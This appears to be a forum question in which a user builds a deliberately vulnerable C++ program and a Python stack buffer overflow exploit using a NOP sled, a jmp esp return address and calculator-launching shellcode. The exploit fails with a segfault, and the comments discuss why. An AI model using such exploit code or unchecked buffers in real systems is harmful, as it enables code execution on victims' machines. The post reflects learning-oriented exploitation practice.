# no useful output other than seg error while writing a buffer overflow

Tags: python, c++

I am trying to write a c++ buffer overflow but i keep on getting SIGSEGV error

```
#include <iostream>
using namespace std;

int main() {
    char buff[64];
    cin>>buff;
    cout<<buff;
    return 0;
}
```

this is the c++ code that i wrote and

```
g++ -g -fno-stack-protector -o output inputfile.cpp
```

the inputfile.cpp was compiled as above

i wrote a python script to check if the exploit works

```
import struct 
from subprocess import *

p = Popen(['output.exe'],stdout=PIPE,stdin=PIPE)

PAD = b"\x41"*13
NOP = b"\x90"*40
EIP = struct.pack("I", 0x6eb53d46)

shell_code =  b"\xeB\x02\xBA\xC7\x93\xBF\x77\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x61\x6C\x63"

output = PAD+EIP+NOP+shell_code
p.communicate(output)
```

using  Immunity debugger to find the jmp esp addresses one of them used in the above python script 
the output length is 76 the offset is 76 that 64 plus 12 bytes 
the shell code used opens the calculator

when i run the python script nothing happens and when i use gdb debugger i get the SEG Error i am stuck here and can't seem to figure out what is wrong or what i am doing wrong

shellcode source

http://shell-storm.org/shellcode/files/shellcode-567.php

Comment: Segmentation error is a common result of a buffer overflow.

Comment: isnt a buffer overflow a segmentation error? As you enter a segment yo should not enter.

Comment: @TheFool not always. Sometimes you get unlucky and the program keeps chugging along cranking out subtly wrong answers that hopefully are noticed before anything catastrophic happens.

Comment: i know that but the result of my exploit is the calculator poping on my screen but for some reason nothing happens

Comment: any advice to overcome this

Comment: Modern OSs (read: 1990s+) are just not this stupid, no offence.

Comment: Perhaps put your energies into something constructive instead of trying to fight basic security protocols to create silly "exploits"? :)

Comment: @TheFool Generally a "segment" in this context is something like a page, so that'll only happen if your bad access crosses a page boundary into a page you shouldn't be reading from. That appears to have occurred indirectly here as a result of corrupting the stack.

Comment: @LightnessRacesBY-SA3.0, thanks. That said, if you were to do the buffer overflow correctly. Not going somewhere in between but to valid memory address, you would prevent the SEG fault?

Comment: @TheFool Yeah. Many buffer overflows go undetected. Some for years.

Comment: This question is not about the shellcode.

Comment: can you at least tell me if i am doing it the right way